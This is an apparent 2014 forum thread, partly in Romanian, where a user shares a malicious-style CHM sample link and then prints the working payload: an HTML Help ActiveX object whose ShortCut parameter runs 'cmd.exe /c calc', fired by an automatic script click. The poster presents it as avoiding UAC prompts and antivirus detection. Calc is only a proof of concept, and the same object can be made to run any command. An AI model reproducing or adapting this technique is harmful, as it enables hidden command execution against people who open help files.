Run calc.exe from chm: SAMPLE

Nytro · November 19, 2014

Run calc.exe via open Chm file, no UAC warning and no av detects! Sample :

https://mega.co.nz/#!tRkkFLwY!vwwya5sF3btFVnItOeV7-VN7402uMhlaCAEPjiZy-og

blech · November 19, 2014

pass?

LE: scuze Nytro, nu eram atent.

multumesc!

Edited November 19, 2014 by blech

Nytro · November 19, 2014

In numele fisierului: "infected".

Merge. Si functioneaza asa:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",cmd.exe,/c calc ,">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>
x.Click();
</SCRIPT>

Acel classid identifica HHCtrl Object, un ActiveX numit IE HTML Help Control.

Edited November 19, 2014 by Nytro

Sign In

Run calc.exe from chm: SAMPLE

Recommended Posts

Nytro

blech

Nytro

Join the conversation

Browse

Activity

Pages